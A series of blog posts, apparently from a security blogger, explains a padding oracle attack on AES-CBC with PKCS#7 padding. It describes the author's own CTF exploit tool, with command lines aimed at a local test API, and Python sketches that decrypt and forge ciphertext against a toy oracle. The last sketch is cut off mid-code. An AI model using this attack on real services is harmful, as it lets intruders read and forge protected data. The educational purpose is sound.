Padding Oracle 3–making it usable

Just a quick note, because I’ve been sick this week, but last weekend, I put a little more work into my Padding Oracle exploit tool.

You can find the new code up at https://github.com/alunmj/PaddingOracle, and because of all the refactoring, it’s going to look like a completely new batch of code. But I promise that most of it is just moving code from Program.cs into classes, and adding parsing of command-line arguments.

I don’t pretend to be the world’s greatest programmer by any stretch, so if you can tell me a better way to do what I’ve done here, do let me know, and I’ll make changes and post something about them here.

Also, please let me know if you use the tool, and how well it worked (or didn’t!) for you.

Arguments

The arguments currently supported are:

URL

The only parameter unadorned with an option letter – this is the URL for the resource the Padding Oracle code will be pounding to test guesses at the encrypted code.

-c ciphertext

Also, –cipher. This provides a .NET regular expression which matches the ciphertext in the URL.

-t encoding:b64|b64URL|hex|HEX

Also, –textencoding, –encoding. This sets the encoding that’s used to specify the ciphertext (and IV) in the URL. The default is b64.

  • b64 – standard base64, URL encoded (so ‘=’ is ‘%3d’, ‘+’ is ‘%2b’, and ‘/’ is ‘%2f’)
  • b64URL – “URL safe” base64, which uses ‘!’, ‘-’ and ‘~’ instead of the base64 characters that would be URL encoded.
  • hex – hexadecimal encoding with lower case alphabetic characters a-f.
  • HEX – hexadecimal encoding with upper case alphabetic characters A-F.

-i iv

Also, –iv. This provides a .NET regular expression which matches the IV in the URL if it’s not part of the ciphertext.

-b blocksize

Also, –blocksize. This sets the block size in bytes for the encryption algorithm. It defaults to 16, but should work for values up to 32.

-v

Also, –verbose. Verbose – output information about the packets we’re decrypting, and statistics on speed at the end.

-h

Also, –help. Outputs a brief help message.

-p parallelism:-1|1|#

Also –parallelism. Dictates how much to parallelise. Specifying ‘1’ means to use one thread, which can be useful to see what’s going on. -1 means “maximum parallelisation” – as many threads as possible. Any other integer is roughly akin to saying “no more than this number of threads”, but may be overridden by other aspects of the Windows OS. The default is -1.

-e encryptiontext

Instead of decrypting, this will encrypt the provided text, and provide a URL in return that will be decrypted by the endpoint to match your provided text.

Examples

These examples are run against the WebAPI project that’s included in the PadOracle solution.

Example 1

Let’s say you’ve got an example URL like this:

http://localhost:31140/api/encrypted/submit?iv=WnfvRLbKsbYufMWXnOXy2Q%3d%3d&ciphertext=087gbLKbFeRcyPUR2tCTajMQAeVp0r50g07%2bLKh7zSyt%2fs3mHO96JYTlgCWsEjutmrexAV5HFyontkMcbNLciPr51LYPY%2f%2bfhB9TghbR9kZQ2nQBmnStr%2bhI32tPpaT6Jl9IHjOtVwI18riyRuWMLDn6sBPWMAoxQi6vKcnrFNLkuIPLe0RU63vd6Up9XlozU529v5Z8Kqdz2NPBvfYfCQ%3d%3d

This strongly suggests (because who would use “iv” and “ciphertext” to mean anything other than the initialisation vector and cipher text?) that you have an IV and a ciphertext, separate from one another. We have the IV, so let’s use it – here’s the command line I’d try:

PadOracle "http://localhost:31140/api/encrypted/submit?iv=WnfvRLbKsbYufMWXnOXy2Q%3d%3d&ciphertext=087gbLKbFeRcyPUR2tCTajMQAeVp0r50g07%2bLKh7zSyt%2fs3mHO96JYTlgCWsEjutmrexAV5HFyontkMcbNLciPr51LYPY%2f%2bfhB9TghbR9kZQ2nQBmnStr%2bhI32tPpaT6Jl9IHjOtVwI18riyRuWMLDn6sBPWMAoxQi6vKcnrFNLkuIPLe0RU63vd6Up9XlozU529v5Z8Kqdz2NPBvfYfCQ%3d%3d" -c "087gb.*%3d%3d" -i "WnfvRL.*2Q%3d%3d"

This is the result of running that command:

[Screenshot: output of the decryption run]

Notes:

  • The IV and the Ciphertext both end in Q==, which means we have to specify the regular expressions carefully to avoid the expression being greedy enough to catch the whole query string.
  • I didn’t use the “-v” output to watch it run and to get statistics.
  • That “12345678” at the end of the decrypted string is actually there – it’s me trying to push the functionality – in this case, to have an entirely padding last block. [I should have used the letter “e” over and over – it’d be faster.]
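The greediness point in the first note can be seen in a few lines. This is only a sketch: it uses Python's re module rather than the .NET regex engine the tool uses (for patterns this simple I'd expect the two to behave the same), and the URL is a shortened stand-in whose ciphertext is abbreviated but still ends in "Q%3d%3d" like the IV.

```python
import re

# Shortened stand-in for the example URL; the ciphertext value is abbreviated
# for readability but keeps the same "Q%3d%3d" ending as the IV.
url = ("http://localhost:31140/api/encrypted/submit"
       "?iv=WnfvRLbKsbYufMWXnOXy2Q%3d%3d"
       "&ciphertext=087gbLKbFeRcfYfCQ%3d%3d")

# Too loose: the greedy ".*" runs on to the LAST "Q%3d%3d" in the string,
# so the "IV" match swallows the ciphertext parameter as well.
loose = re.search(r"WnfvRL.*Q%3d%3d", url).group(0)

# Anchoring on "2Q%3d%3d" (which only the IV ends with) stops in the right place.
tight = re.search(r"WnfvRL.*2Q%3d%3d", url).group(0)

print(loose)
print(tight)
```

The second pattern is the one used on the command line above; the first shows what goes wrong if you leave out the "2".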

Example 2

Same URL, but this time I want to encrypt some text.

Our command line this time is:

PadOracle "http://localhost:31140/api/encrypted/submit?iv=WnfvRLbKsbYufMWXnOXy2Q%3d%3d&ciphertext=087gbLKbFeRcyPUR2tCTajMQAeVp0r50g07%2bLKh7zSyt%2fs3mHO96JYTlgCWsEjutmrexAV5HFyontkMcbNLciPr51LYPY%2f%2bfhB9TghbR9kZQ2nQBmnStr%2bhI32tPpaT6Jl9IHjOtVwI18riyRuWMLDn6sBPWMAoxQi6vKcnrFNLkuIPLe0RU63vd6Up9XlozU529v5Z8Kqdz2NPBvfYfCQ%3d%3d" -c "087gb.*%3d%3d" -i "WnfvRL.*2Q%3d%3d" -e "Here’s some text I want to encrypt"

When we run this, it warns us it’s going to take a very long time, and boy it’s not kidding – we don’t get any benefit from the frequency table, and we can’t parallelise the work.

[Screenshot: output of the encryption run]

And you can see it took about two hours.

Padding Oracle 2: Speeding things up

Last time, I wrote about how I’d decided to write a padding oracle exploit tool from scratch, as part of a CTF, and so that I could learn a thing or two. I promised I’d tell you how I made it faster… but first, a question.

Why build, when you can borrow?

One question I’ve had from colleagues is “why didn’t you just run PadBuster?”

It’s a great question, and in general, you should always think first about whether there’s an existing tool that will get the job done quickly and easily.

Time

Having said that, it took me longer to install PadBuster and the various language components it required than it did to open Visual Studio and write the couple of hundred lines of C# that I used to solve this challenge.

So, from a time perspective, at least, I saved time by doing it myself – and this came as something of a surprise to me.

The time it used up was my normally non-productive time, while I’m riding the bus into Seattle with spotty-to-zero network connectivity (there’s none on the bus, and my T-Mobile hot-spot is useful, but neither fast nor reliable down the I-5 corridor). This is time I generally use to tweet, or to listen to the BBC.

Interest

I just plain found it interesting to take what I thought I knew about padding oracles, and demonstrate that I had it solidly in my head.

That’s a benefit that really can’t be effectively priced.

Plus, I learned a few things doing it myself:

  • Parallelisation in C# is easier than it used to be.
  • There’s not much getting around string conversions in trying to speed up the construction of a base64-encoded URL, but then again, when executing against a crypto back-end, that’s not your bottleneck.
  • Comments and blank lines are still important, especially if you’re going to explain the code to someone else.

Performance

The other thing that comes with writing your own code is that it’s easier to adjust it for performance – you know where the bottlenecks might lie, and you can dive in and change them without as much of a worry that you’re going to kill the function of the code. Because you know at a slightly more intuitive level how it all works.

You can obviously achieve that intuitive level over time with other people’s code, but I wasn’t really going to enjoy that.

Looking at some of the chat comments directed at the PadBuster author, it’s clear that other people have tried to suggest optimisations to him, but he believes them not to be possible.

Guessing

Specifically, he doesn’t see that it’s possible to use guesses as to the plaintext’s likely contents to figure out what values should be in the ciphertext. You just plug the values 0..255 into the N-1 ciphertext block until your padding error from the N block goes away, and then that value can be XORed with the padding value to get the intermediate value from the N block. Then the intermediate value gets XORed with the original ciphertext value from the N-1 block to give the original plaintext.

Let’s see how that works in the case of the last block – where we’re expecting to see some padding anyway. Let’s say our block size is 4. Here’s what two of our ciphertext blocks might look like:

CN-1: 0xbe 0x48 0x45 0x30
CN: 0x71 0x4f 0xcc 0x63

Pretty random, right? Yeah, those are actually random numbers, but they’ll work to illustrate how we work here.

We iterate through values of CN-1[3] from 0..255, until we get a response that indicates no padding errors.

0x30 comes back without any padding errors. That’s convenient. So, we’ve sent “be484530714fcc63”, and we know now that we’ve got a padding byte correct. Buuut that isn’t the only right padding byte, because this is the last block, which also has a valid padding byte.

In fact, we can see that 0x30 matches the original value of the CN-1 block’s last byte, so that’s not terribly useful. Our padding count has a good chance of not being 1, and we’re trying to find the value that will set it to 1.

Keep iterating, and we get 0x32, giving us a request that doesn’t contain a padding exception. Two values. Which one made our padding byte 0x1, so we can use it to determine the intermediate value?

The only way we get two matches will be because the real plaintext ends in a padding count that isn’t 0x1. One of those values corresponds to 0x1, the other corresponds to the padding count, which could be 0x2..0x4. [Because we’re using four byte blocks as an example – a real-life example might have a 16-byte block size, so the padding count could be up to 0x10]

The clue is in the original plaintext – 0x30 MUST be the value that corresponds to the original padding count, so 0x32 MUST correspond to 0x1.

[If the original padding count was 0x1, we would only find one value that matched, and that would be the original value in CN-1]

That means the Intermediate value is 0x32 XOR 0x1 = 0x33 – which means the plaintext value is 0x3 – there’s three bytes of padding at the end of this block.
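The two-match reasoning can be replayed with a toy oracle. This is a sketch in Python, not the C# from the repo: padding_ok and the INTERMEDIATE constant are hypothetical stand-ins for the server and its key-dependent decryption, with values chosen to agree with the four-byte example.

```python
BLOCK = 4
C_PREV = bytes([0xBE, 0x48, 0x45, 0x30])   # C(N-1) from the example

# Stand-in for D_K(C_N). A real attacker never sees this; it lives on the server.
# The first byte is chosen so that P_N starts with '}' (0xbe XOR 0xc3 = 0x7d).
INTERMEDIATE = bytes([0xC3, 0x4B, 0x46, 0x33])

def padding_ok(c_prev: bytes) -> bool:
    """Toy oracle: True when INTERMEDIATE XOR c_prev ends in valid padding."""
    plain = bytes(i ^ c for i, c in zip(INTERMEDIATE, c_prev))
    count = plain[-1]
    return 1 <= count <= BLOCK and plain.endswith(bytes([count]) * count)

# Try every value for the last byte of C(N-1); keep those the oracle accepts.
hits = [g for g in range(256) if padding_ok(C_PREV[:-1] + bytes([g]))]

# The hit equal to the original byte reproduces the real padding; the other
# one forced the last plaintext byte to 0x01. (If the real padding count were
# 0x1 there would be only one hit, and this next() would find nothing.)
forced_one = next(g for g in hits if g != C_PREV[-1])
intermediate_last = forced_one ^ 0x01
padding_count = intermediate_last ^ C_PREV[-1]

print([hex(h) for h in hits], hex(intermediate_last), padding_count)
# ['0x30', '0x32'] 0x33 3
```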

We can actually write down the values of the last three plaintext and intermediate bytes now:

CN-1: 0xbe 0x48 0x45 0x30
CN: 0x71 0x4f 0xcc 0x63
IN: ?? 0x4b 0x46 0x33
C’N-1: ?? 0x4f 0x42 0x37
PN: ?? 0x3 0x3 0x3

Wow – that’s easy! How’d we do that? Really simple. We know the last padding must be three bytes of 0x3, so we write those down. Then the intermediate bytes must be the XOR of 0x3 with the value in the CN-1 block.

[I chose in the code, instead of just “writing down” the values for each of those bytes, to check each one as I did so, to make sure that things were working. This adds one round-trip for each byte of padding, which is a relatively low cost, compared to the rest of the process.]

Now, if we want to detect the next byte, we want to change the last three bytes of CN-1, so they’ll set the PN values to 0x4, and then iterate through the target byte until we get a lack of padding errors.

So, each new value of the last few bytes of CN-1 will be C’[i] = C[i] XOR 0x3 XOR 0x4 – taking the value in the original, XORing it with the original plaintext, and then with the desired plaintext to get a new value for the ciphertext.

I’ve put those values of C’N-1 in the table above.
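As a quick check of that arithmetic, here is the same calculation in Python (a sketch; the variable names are mine):

```python
c_prev = bytes([0xBE, 0x48, 0x45, 0x30])   # original C(N-1)
old_pad, new_pad = 0x03, 0x04              # known plaintext, desired plaintext

# C'[i] = C[i] XOR old plaintext XOR desired plaintext, for the last three bytes.
c_prime_tail = bytes(c ^ old_pad ^ new_pad for c in c_prev[1:])

print(c_prime_tail.hex())   # 4f4237
```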

This trick doesn’t just stop with the padding bytes, though. I’m going to guess this is a JSON object, so it’s going to end with a ‘}’ character (close-brace), which is 0x7d.

So, C’ = C XOR 0x7d XOR 0x4 = 0xbe XOR 0x7d XOR 0x4 = 0xc7.

Let’s try that – we now send “c74f4237” – no padding error!

A successful guess for the last four bytes of PN. Now we can fill in more of the table:

CN-1: 0xbe 0x48 0x45 0x30
CN: 0x71 0x4f 0xcc 0x63
IN: 0xc3 0x4b 0x46 0x33
C’N-1: 0xc7 0x4f 0x42 0x37
PN: 0x7d 0x3 0x3 0x3

Awesome.

That does require me making the right guess, surely, though?

Yes, but it’s amazing how easy it is to either make completely correct guesses, or just pick a set of values that are more likely to be good guesses, and start by trying those, falling back to the “plod through the rest of the bytes” approach when you need to.

I’ve coded an English-language frequency table into my padding oracle code, because that was appropriate for the challenge I was working on.

This code is available for you to review and use at https://github.com/alunmj/PaddingOracle/blob/master/PadOracle/Program.cs

You can imagine all kinds of ways to improve your guesses – when proceeding backward through a JSON object, for instance, a ‘}’ character will be at the end; it’ll be preceded by white space, double quotes, or brackets/braces, or maybe numerics. A 0x0a character will be preceded by a 0x0d (mostly), etc.
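A minimal sketch of “try the likely bytes first, then plod through the rest”, again in Python against a toy oracle rather than the real tool. The LIKELY list is a made-up handful of JSON-ish characters, not the frequency table from the repo, and INTERMEDIATE stands in for the server-side decryption of the four-byte example.

```python
BLOCK = 4
C_PREV = bytes([0xBE, 0x48, 0x45, 0x30])
INTERMEDIATE = bytes([0xC3, 0x4B, 0x46, 0x33])   # stand-in for D_K(C_N)

def padding_ok(c_prev: bytes) -> bool:
    """Toy oracle: True when INTERMEDIATE XOR c_prev ends in valid padding."""
    plain = bytes(i ^ c for i, c in zip(INTERMEDIATE, c_prev))
    count = plain[-1]
    return 1 <= count <= BLOCK and plain.endswith(bytes([count]) * count)

# Hypothetical guess list: characters that often end a JSON document.
LIKELY = b'}"] \n0123456789'

def find_first_byte():
    """Recover P_N[0], returning (plaintext byte, number of oracle queries)."""
    # The last three plaintext bytes are known to be 0x03; retarget them to 0x04.
    tail = bytes(c ^ 0x03 ^ 0x04 for c in C_PREV[1:])
    # Likely guesses first, then every remaining byte value, without repeats.
    order = list(dict.fromkeys(list(LIKELY) + list(range(256))))
    for tries, guess in enumerate(order, start=1):
        forged = bytes([C_PREV[0] ^ guess ^ 0x04]) + tail
        if padding_ok(forged):
            return guess, tries
    raise RuntimeError("oracle rejected every value")

print(find_first_byte())   # (125, 1): '}' found on the first query
```

Walking the ciphertext byte from 0 upwards instead would not reach 0xc7 until the 200th query, which is where the speed-up comes from.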

Parallelisation

The other big performance improvement I made was to parallelise the search. You can work on one block entirely independently from another.

I chose to let the Parallel.For() function from C# decide exactly how it was going to split up work between different blocks, and the result is a whole lot faster. There are some wrinkles to manage when parallelising an algorithm, but I’m not going to get into that here. This is not a programming blog, really!
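To give a flavour of the shape of it, here is a rough Python sketch using a thread pool in place of C#’s Parallel.For(). Everything in it is a stand-in: d_k is a hash pretending to be the server’s block decryption, and recover_block is a placeholder for the byte-by-byte oracle search, which in real life spends its time waiting on HTTP responses.

```python
import hashlib
from concurrent.futures import ThreadPoolExecutor

BLOCK = 16

def d_k(block: bytes) -> bytes:
    """Stand-in for the server's block decryption D_K (not a real cipher)."""
    return hashlib.sha256(b"hypothetical key" + block).digest()[:BLOCK]

def recover_block(pair):
    """Placeholder for the oracle search on one (C[n-1], C[n]) pair.
    The real search would arrive at these same bytes via many requests."""
    prev, cur = pair
    return bytes(a ^ b for a, b in zip(d_k(cur), prev))

def recover_all(blocks, max_workers=None):
    """Each adjacent pair of blocks is an independent work item."""
    pairs = list(zip(blocks, blocks[1:]))
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # map() hands results back in block order, whatever order they finish in.
        return b"".join(pool.map(recover_block, pairs))

blocks = [bytes([n]) * BLOCK for n in range(5)]   # IV plus four ciphertext blocks
plaintext = recover_all(blocks, max_workers=4)
print(len(plaintext))   # 64
```

Because each pair only needs its own two blocks, no locking is required around the work itself; the ordering of results is the one thing to keep an eye on.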

15x performance improvement

I figured I’d put that in big letters, because it’s worth calling out – the parallelisation alone obviously multiplies your performance by the number of cores you’ve got (or the number of cores the web server has, if it’s underpowered), and the predictive work on the text does the rest. Obviously, the predictive approach only works if you can separate between “likely” and “unlikely” characters – if the plaintext consists of random binary data, you’re not going to get much of a benefit. But most data is formatted, and/or is related to English/Latin text.

Bonus stage – use a decryptor to encrypt!

I haven’t published the code for this part yet, but you can use this same breach to encrypt data without knowing the key.

This is really fun and simple once you get all the previous stuff. Here goes.

Let’s encrypt a block.

Encrypting a block requires the generation of two ciphertext blocks from one plaintext block. What the second block is, actually doesn’t matter. We can literally set it to random data, or (which is important) specific data of our choosing.

The first block of the pair, acting like an IV, we can set to 0. There’s a reason for this which we’ll come to in a minute.

With these two initial blocks, we run the decrypter. This will give us a ‘plaintext’ block as output. Remember how the intermediate block is the plaintext block XORed with the first of the pair of blocks? Well, because we set that first block to all zeroes, that means the plaintext block IS the same as the intermediate block. And that intermediate block was generated by decrypting the second block of the pair. In order for that decryption to result in the plaintext we want instead, we can simply take the intermediate block, XOR it with the plaintext block we want, and then put that into the first ciphertext block. [We’re actually XORing this with the first ciphertext block, but that’s a straight copy in this case, because the first ciphertext block is zeroes.]

Now, draw the rest of the owl

Do the same thing for each of the rest of the blocks.

Sadly, there’s no parallelising this approach, and the guessing doesn’t help you either. You have to start with CN (randomly generated) and CN-1 (deduced with the approach above), then when you’ve established what CN-1 is, you can use the same approach to get CN-2, and so on back to the IV (C0). So this process is just plain slow. But it allows you to encrypt an arbitrary set of data.
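The backwards chaining can be sketched like this in Python. It is a toy under stated assumptions: d_k is a hash standing in for the server’s block decryption, and where the sketch calls d_k directly, the real attack would have to recover that intermediate block through the padding oracle, one byte at a time.

```python
import hashlib
import os

BLOCK = 16

def d_k(block: bytes) -> bytes:
    """Stand-in for the server's block decryption D_K (not a real cipher)."""
    return hashlib.sha256(b"hypothetical key" + block).digest()[:BLOCK]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def pad(data: bytes) -> bytes:
    count = BLOCK - len(data) % BLOCK
    return data + bytes([count]) * count

def forge(plaintext: bytes):
    """Build [IV, C1, ..., CN] that CBC-decrypts to plaintext, last block first."""
    padded = pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    chain = [os.urandom(BLOCK)]            # CN can be anything at all
    for wanted in reversed(blocks):
        intermediate = d_k(chain[0])       # real attack: found via the oracle
        chain.insert(0, xor(intermediate, wanted))
    return chain

def cbc_decrypt(chain) -> bytes:
    """What the server would do with the forged blocks."""
    out = b"".join(xor(d_k(cur), prev) for prev, cur in zip(chain, chain[1:]))
    return out[:-out[-1]]

message = b"Here's some text I want to encrypt"
print(cbc_decrypt(forge(message)) == message)   # True
```

Each pass through the loop needs the block produced by the previous pass, which is why this part cannot be split across threads.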

Padding Oracles for a thousand, please

We did a CTF at work.

I have to say it was loads of fun – I’ve never really participated in a CTF before, so it was really good to test my hacking skills against my new colleagues.

We had one instruction from my manager – “don’t let the interns beat you”. I was determined to make sure that didn’t happen, but I was also determined to share as much knowledge and excitement for InfoSec as possible. This meant that once or twice, I may have egged an intern on in the face of the fact that they were about to discover it anyway, and it just seemed like a really good way to keep them interested.

This is not that story.

This is about me turning the corner from knowing about a security failure, to understanding how it works. Let’s see if I can help you guys understand, too.

Tales from the Crypto

That’s the title of my blog, and there’s not a whole lot of cryptography here. It’s just a play on words, which was a little more relevant when I first started the blog back in 2005. So here’s some crypto, at last.

There’s several aspects to cryptography that you have to get right as a developer:

  • Identify whether you’re doing hashing, signing, encryption, encoding, etc.
  • If you have a key, create and store it securely
  • Pick correct algorithms – modern algorithms with few known issues
  • Use the algorithms in a way that doesn’t weaken them

Having tried to teach all of these to developers in various forms, I can tell you that the first one, which should be the simplest, is still surprisingly hard for some developers to master. Harder still for managers – the number of breach notifications that talk about passwords being “encrypted” is a clear sign of this – encrypted passwords mean either your developers don’t understand and implemented the wrong thing, or your manager doesn’t understand what the developer implemented and thinks “encrypted sounds better than hashed”, and puts that down without checking that it’s still technically accurate.

Key creation (so it’s not predictable), and storage (so it can’t be found by an attacker) is one of those issues that seems to go perennially unsolved – I’m not happy with many of the solutions I’ve seen, especially for self-hosted services where you can’t just appeal to a central key vault such as is currently available in all good cloud platforms.

Picking correct algorithms is a moving target. Algorithms that were considered perfectly sound ten or twenty years ago are now much weaker, and can result in applications being much weaker if they aren’t updated to match new understanding of cryptography, and processor and memory speed and quantity improvements. You can store rainbow tables in memory now that were unthinkable on disk just a decade or two ago.

Finally, of course, if all that wasn’t enough to make cryptography sound really difficult (spoiler: it is, which is why you get someone else to do it for you), there are a number of ways in which you can mess up the way in which you use the algorithm.

Modes, block-sizes, and padding

There are a large number of parameters to set even when you’ve picked which algorithms you’re using. Key sizes, block sizes, are fairly obvious – larger is (generally) better for a particular algorithm. [There are exceptions, but it’s a good rule of thumb to start from.]

There are a number of different modes available, generally abbreviated to puzzling TLAs – ECB, CFB, OFB, CBC, GCM, CTR, and so on and so forth. It’s bewildering. Each of these modes just defines a different order in which to apply various operations to do things like propagating entropy, so that it’s not possible to infer anything about the original plaintext from the ciphertext. That’s the idea, at least. ECB, for instance, fails on this because any two blocks of plaintext that are the same will result in two blocks of ciphertext that are the same.

And if you’re encrypting using a block cipher, you have to think about what to do with the last block – which may not be a complete block. This requires that the block be filled out with “padding” to make a full block. Even if you’re just filling it out with zeroes, you’re still padding – and those zeroes are the padding. (And you have to then answer the question “what if the last block ended with a zero before you padded it?”)

There’s a number of different padding schemes to choose from, too, such as “bit padding”, where after the last bit, you set the next bit to 1, and the remaining bits in the block to 0. Or there’s padding where the last byte is set to the count of how many padding bytes there are, and the remaining bytes are set to 0 – or a set of random bytes – or the count repeated over and over. It’s this latter that is embodied as PKCS#5 or PKCS#7 padding. For the purposes of this discussion, PKCS#7 padding is a generalised version of PKCS#5 padding. PKCS#5 padding works on eight-byte blocks, and PKCS#7 padding works on any size blocks (up to 255 bytes, since the count has to fit in a single byte).

So, if you have a three-byte last block, and the block size is 16 bytes, the last block is ** ** ** 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d 0x0d (where “**” represents the last three bytes of data, and 0x0d represents the hexadecimal value for 13, the number of bytes in the padding). If your last block is full, PKCS#7 covers this by making you create an extra 16-byte block, with the value 0x10 (decimal 16) in every byte.
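In code, PKCS#7 padding and its check come out roughly like this. It’s a Python sketch with function names of my own choosing, not any particular library’s API.

```python
def pkcs7_pad(data: bytes, block_size: int = 16) -> bytes:
    """Append N bytes of value N; a full last block gains a whole extra block."""
    count = block_size - (len(data) % block_size)
    return data + bytes([count]) * count

def pkcs7_unpad(padded: bytes, block_size: int = 16) -> bytes:
    """Strip the padding, raising ValueError if it is malformed."""
    if not padded or len(padded) % block_size:
        raise ValueError("length is not a multiple of the block size")
    count = padded[-1]
    if not 1 <= count <= block_size or not padded.endswith(bytes([count]) * count):
        raise ValueError("bad padding")
    return padded[:-count]

print(pkcs7_pad(b"abc").hex())
# 6162630d0d0d0d0d0d0d0d0d0d0d0d0d
```

That “bad padding” error is the thing to watch: if a caller can tell it apart from other failures, the check has become the oracle this post is about.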

Tying this in to the CTF

It’s not at all unlikely that you wind up with the scenario with which we were presented in the CTF – a service that communicated with AES encryption, in CBC mode, using PKCS#7 padding. The fact that this was described as such was what tipped me off in the first place. This is the perfect setup for a Padding Oracle attack.

An Oracle is simply a device/function/machine/system/person that you send a request to, and get a response back, and which gives you some information as a result. The classical Oracles of Ancient Greece & Roman times were confusing and unhelpful at best, and that’s really something we want from any cryptographic oracle. The term “Random Oracle” refers to a hypothetical system which returns random information to every query. A good cryptographic system is one that is indistinguishable from a Random Oracle.

Sadly, CBC with PKCS#7 padding is generally very different from a Random Oracle. It is a Padding Oracle, because it will tell us when the padding is correct or incorrect. And that’s our vulnerability.

At this point, I could have done what one of my colleagues did, and downloaded PadBuster, choosing parameters and/or modifying code, to crack the encryption.

But… I’ve been attacking this CTF somewhat … non-traditionally, using tools other than the normal ones, and so I thought I’d try and understand the algorithm’s weaknesses, and implement my own attack. I wrote it on the bus on my way into work, and was pleased to see when I got in that it worked – albeit slowly – first time.

How CBC and PKCS#5/7 are vulnerable

When decrypting each block using CBC, we say that PN = DK(CN)⊕CN-1 – which is just a symbolic way of saying that the recipient Decrypts (with key “K”) the current Ciphertext block (block N), and then XORs the result with the previous Ciphertext block (the N-1th block). Let’s also assume that we’re only decrypting those two blocks, N-1 and N, with N being the last block provided to the recipient.

In other modes, the padding check may not deliver the helpful information we’re looking for, but CBC is special. The way CBC decrypts data is to decrypt the current block of ciphertext (CN), which creates an intermediate block DK(CN). That intermediate block is combined with the previous ciphertext block, CN-1, to give the plaintext block, PN. This combining of blocks is done using the XOR (exclusive-or) operation, which has interesting properties any developer should be familiar with. Particularly, it’s important to note that XOR (represented here as “⊕”) is reversible. If X⊕Y=Z, you know also that Z⊕Y=X and Z⊕X=Y. This is one of the reasons the XOR operation is used in a lot of cryptographic algorithms.

If we want to change things in the inputs to produce a different output, we can really only change two things – the current and the previous block of Ciphertext – CN and CN-1. We should really only alter one input at a time. If we alter CN, that’s going to be decrypted, and a small change will be magnified into a big difference to the DK(CN) value – all the bytes will have changed. But if we alter CN-1, just a bit, what we wind up with is a change in the plaintext value PN which matches that change. If we alter the 23rd bit of CN-1, it will alter the 23rd bit of PN, and only that one bit. Now if we can find what we’ve changed that bit to, we can then figure out what that means we must have changed it from.
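Here is that difference between tweaking CN-1 and tweaking CN, as a Python sketch. The d_k function is a hash standing in for a real block decryption (it is not a cipher, just something that scrambles its input), and I’m counting the 23rd bit from 1 with the most significant bit first, which puts it in the third byte.

```python
import hashlib

BLOCK = 16

def d_k(block: bytes) -> bytes:
    """Stand-in for the server's block decryption D_K (not a real cipher)."""
    return hashlib.sha256(b"hypothetical key" + block).digest()[:BLOCK]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_plain(c_prev: bytes, c_cur: bytes) -> bytes:
    """P_N = D_K(C_N) XOR C_(N-1)."""
    return xor(d_k(c_cur), c_prev)

c_prev = bytes(range(16))
c_cur = bytes(range(16, 32))
original = cbc_plain(c_prev, c_cur)

# Flip the 23rd bit of C(N-1): exactly that bit of the plaintext changes.
tweaked_prev = bytearray(c_prev)
tweaked_prev[2] ^= 0x02
diff_prev = xor(original, cbc_plain(bytes(tweaked_prev), c_cur))

# Flip the same bit of C(N): the change goes through D_K and lands everywhere.
tweaked_cur = bytearray(c_cur)
tweaked_cur[2] ^= 0x02
diff_cur = xor(original, cbc_plain(c_prev, bytes(tweaked_cur)))

print(diff_prev.hex())   # 00000200000000000000000000000000
print(diff_cur.hex())    # a scatter of changed bytes
```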

If we change the last byte of CN-1, to create C’N-1 (pronounced “C prime of N minus 1”) and cycle it through all the possible values it can take, the decryption will occur, and the recipient will reject our new plain text, P’N (“P prime of N”) because it is poorly formed – it will have a bad padding. With one (two, but I’ll come to that in a minute) notable exception. If the last byte of the plaintext decrypted is the value 0x01, it’s a single byte of padding – and it’s correct padding. For that value of the last byte of C’N-1, we know that the last byte of P’N is 1. We can rewrite PN = DK(CN)⊕CN-1 as DK(CN) = CN-1⊕PN – and then we can put the values in for the last byte: DK(CN)[15] = C’N-1[15]⊕0x01.

Let’s say, for illustration’s sake, that the value we put in that last byte of C’N-1 was 0xa5, when our padding was accepted. That means DK(CN)[15] = 0xa5 ⊕ 0x01 = 0xa4. Note the lack of any “prime” marks there – we’ve figured out what the original value of the decrypted last byte was. Note that this isn’t the same as the last byte of the plain text. No, we get that by taking this new value and XORing it with the original last byte of the previous block of ciphertext – that’s CN-1[15]. For illustration, let’s say that value is 0xc5. We calculate PN[15] = DK(CN)[15]⊕CN-1[15] = 0xa4⊕0xc5 = 0x61. That’s the lower case letter ‘a’.

OK, so we got the first piece of plaintext out – the last byte.

[Remember that I said I’d touch on another case? If CN is the original last block of ciphertext, it already contains valid padding! But not necessarily the 0x01 we’re trying to force into place.]

Let’s get the next byte!

Almost the same process is used to get the next byte, with a couple of wrinkles. First, obviously, we’re altering the second-to-last byte through all possible values. Second, and not quite so obvious, we have to tweak the last byte once as well, because we’re looking to get the sequence 0x02 0x02 (two twos) to happen at the end of P’N. The last byte of C’N-1 to achieve this is simply the last byte of C’N-1 that we used to get 0x01, XORed by 0x03 (because that’s 0x02 ⊕ 0x01). In our illustrative example, that’s 0xa6.

And the next, and the next…

Each time, you have to set the end values of the ciphertext block, so that the end of P’N will look like 0x03 0x03 0x03, 0x04 0x04 0x04 0x04, etc, all the way up to 0x10 … 0x10 (sixteen 16s).
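Putting the whole walk together for one block looks something like the following. This is a Python sketch of the technique, not the code from the repo: d_k is a hash standing in for the server’s decryption, oracle plays the part of the web request, and the extra check on the last byte deals with the “two valid paddings” case mentioned above.

```python
import hashlib

BLOCK = 16

def d_k(block: bytes) -> bytes:
    """Stand-in for the server's block decryption D_K (not a real cipher)."""
    return hashlib.sha256(b"hypothetical key" + block).digest()[:BLOCK]

def oracle(prev: bytes, cur: bytes) -> bool:
    """Plays the server: True when D_K(cur) XOR prev ends in valid padding."""
    plain = bytes(a ^ b for a, b in zip(d_k(cur), prev))
    count = plain[-1]
    return 1 <= count <= BLOCK and plain.endswith(bytes([count]) * count)

def recover_block(prev: bytes, cur: bytes) -> bytes:
    """Recover P_N using nothing but oracle() answers."""
    inter = bytearray(BLOCK)                  # D_K(cur), filled in back to front
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos                     # 0x01, then 0x02, ... up to 0x10
        forged = bytearray(BLOCK)
        for i in range(pos + 1, BLOCK):
            forged[i] = inter[i] ^ pad        # make the known tail decrypt to pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), cur):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte might be 0x02 0x02 and so on by luck.
                # Disturb the neighbouring byte; only a true 0x01 survives.
                forged[pos - 1] ^= 0xFF
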